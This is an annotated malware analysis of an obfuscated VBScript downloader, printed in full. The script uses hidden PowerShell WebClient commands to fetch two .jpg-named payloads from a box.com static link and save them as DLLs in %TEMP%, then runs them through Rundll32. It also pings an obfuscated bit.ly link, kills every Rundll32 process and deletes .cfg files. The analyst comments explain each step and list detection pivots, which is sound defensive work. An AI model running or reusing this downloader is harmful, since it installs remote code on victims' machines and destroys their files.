- VBScript - script block
- ' Analyst summary: this script is a downloader. It fetches two objects whose names end in .jpg,
- ' writes them under %TEMP% with a .dll extension, and starts each one through Rundll32.exe with a
- ' named export. Keywords and identifiers are written in random mixed case; VBScript and PowerShell
- ' are case-insensitive, so any string matching on this sample has to be case-insensitive as well.
- ' Error handling is switched off here, so a failing step below is skipped without any message.
- on eRRoR ReSume neXT
- ' Payload host: a box.com shared-static link (a public file-sharing service used for staging).
- uRlhoST = "https://img0011021601.box.com/shared/static/"
- ' First payload object name; the .jpg suffix does not match its use below (saved as .dll, run via Rundll32).
- SXRBFR = "5sargpzrcjsyqj14uklmibxrr9hxfjrz.jpg"
- ' Chr() codes 98,105,116,46,108,121,47 spell "bit.ly/", so this is hxxp://bit[.]ly/1Qeb1tz followed by
- ' a double quote (Chr(34)). The host name therefore never appears as a plain string in the script.
- AKLXQU = "http://" & Chr(98) & Chr(105) & Chr(116) & Chr(46) & Chr(108) & Chr(121) & Chr(47) & "1Qeb1tz" & Chr(34)
- ' Drop location: the temp directory, expanded from the environment further down.
- inSTalldiR = "%temp%"
- ' Tag embedded in both dropped file names.
- inSTall_id = "drmlb"
- ' Export names handed to Rundll32.exe for the first and the second DLL respectively.
- UFVUWE = "starter"
- DAGSCQ = "mailstarter"
- ' Second payload object name on the same host.
- JJPMRX = "kkecmbru28abw8rdrazqacn1tfflrwzb.jpg"
- ' Assigned but not referenced again in the visible script (the second path reuses inSTall_id).
- inSTall_id2 = "wuovq"
- ' COM objects: WScript.Shell for process launch and environment expansion, FileSystemObject for file access.
- SeT Shellobj = wScRiPT.cReaTeobjecT("wScRiPT.Shell")
- SeT fileSySTemobj = cReaTeobjecT("ScRiPTing.fileSySTemobjecT")
- ' Resolve %temp% and build the per-host prefix "<COMPUTERNAME>_<username>" (spaces removed from the user name).
- inSTalldiR = Shellobj.eXPandenviRonmenTSTRingS(inSTalldiR) & "\"
- Pcname = Shellobj.eXPandenviRonmenTSTRingS("%comPuTeRname%") & "_"
- uSeRname = Shellobj.eXPandenviRonmenTSTRingS("%uSeRname%")
- uSeRname = RePlace(uSeRname, " ", "")
- ' Staging folder path %TEMP%\<COMPUTERNAME>_<username>; below it is only deleted (its creation is commented out).
- STRdiRecToRy = inSTalldiR & Pcname & uSeRname
- ' Name of the running script file; not used again in the visible script.
- inSTallname = wScRiPT.ScRiPTname
- ' NOTE(review): "YLMQZB" is not a documented SpecialFolders name and the result is not used again here - looks like filler; confirm.
- YLMQZB = Shellobj.SPecialfoldeRS ("YLMQZB") & "\"
- ' Drop paths: %TEMP%\<COMPUTERNAME>_<username>_drmlb.dll and %TEMP%\<COMPUTERNAME>_<username>_drmlbmail_.dll.
- PaThfilename = inSTalldiR & Pcname & uSeRname & "_" & inSTall_id & ".dll"
- PaThfilename2 = inSTalldiR & Pcname & uSeRname & "_" & inSTall_id & "mail_.dll"
- ' PowerShell suffixes of the form ";Start-Process Rundll32.exe <dll>,<export>" plus a closing double quote
- ' (chR(44) is the comma, chR(34) the double quote).
- MNIISL = ";STaRT-PRoceSS Rundll32.eXe " & PaThfilename & chR(44) & UFVUWE & chR(34)
- TKLKGG = ";STaRT-PRoceSS Rundll32.eXe " & PaThfilename2 & chR(44) & DAGSCQ & chR(34)
- ' Requests termination of every process named Rundll32.exe, not only ones this script started.
- ' The trailing 0 is passed as Run's window-style argument (0 = hidden window).
- fechaR = "TaSkkill /im Rundll32.eXe"
- ShelloBj.Run(fechaR),0
- ' If the staging folder exists: stop Rundll32.exe again, wait 1.5 s, then delete the folder.
- if fileSYSTemoBj.foldeReXiSTS(STRdiRecToRY) Then
- on eRRoR ReSume neXT
- ShelloBj.Run(fechaR),0
- WScRiPT.SleeP 1500
- fileSYSTemoBj.DeleTeFoldeR(STRdiRecToRY)
- end if
- ' The same block repeated verbatim: a second attempt at the same removal.
- if fileSYSTemoBj.foldeReXiSTS(STRdiRecToRY) Then
- on eRRoR ReSume neXT
- ShelloBj.Run(fechaR),0
- WScRiPT.SleeP 1500
- fileSYSTemoBj.DeleTeFoldeR(STRdiRecToRY)
- end if
- ' Deletes every *.cfg file directly under %TEMP%, which also removes .cfg files unrelated to this script.
- fileSySTemobj.DeleTeFile(inSTalldiR & "*.cfg")
- ' Disabled code: folder creation is commented out, so both DLL paths point directly into %TEMP%.
- 'if noT fileSySTemobj.foldeReXiSTS(STRdiRecToRy) Then
- ' fileSySTemobj.CReaTeFoldeR(STRdiRecToRy)
- 'end if
- ' Command 1: PowerShell WebClient.DownloadFile(<host + first .jpg name>, <first DLL path>) followed by the
- ' Start-Process Rundll32.exe suffix. Quote characters come from chR(39)/chR(34) instead of literals.
- PwSh1 = "PoweRShell (new-objecT SySTem.neT.webclienT).downloadfile(" & chR(39) & chR(34) _
- & chR(34) & uRlhoST & SXRBFR & ChR(39) & ChR(44) & ChR(39) & PaThfilename & chR(39) & chR(41) & MNIISL & chR(34)
- ' Command 2: the same pattern for the second object, the second DLL path and the "mailstarter" export.
- PwSh2 = "PoweRShell (new-objecT SySTem.neT.webclienT).downloadfile(" & chR(39) & chR(34) _
- & chR(34) & uRlhoST & JJPMRX & ChR(39) & ChR(44) & ChR(39) & PaThfilename2 & chR(39) & chR(41) & TKLKGG & chR(34)
- ' Command 3: WebClient.DownloadString on the bit.ly link; the returned text is not stored or used here.
- ' NOTE(review): presumably a check-in or click counter - confirm against proxy/DNS logs.
- PwSh3 = "PoweRShell (new-objecT neT.webclienT).downloadSTRing(" & chR(39) & AKLXQU & chR(39) & chR(41) & chR(34)
- ' Runs only when the first DLL is absent from %TEMP%; all three commands are started with a hidden window.
- ' Detection pivots: wscript/cscript spawning PowerShell with Net.WebClient on the command line, PowerShell
- ' spawning Rundll32.exe on a DLL under %TEMP%, and a .jpg URL being written to disk with a .dll extension.
- if noT fileSySTemobj.fileeXiSTS (PaThfilename) Then
- on eRRoR ReSume neXT
- Shellobj.Run(PwSh1),0
- Shellobj.Run(PwSh2),0
- Shellobj.Run(PwSh3),0
- End If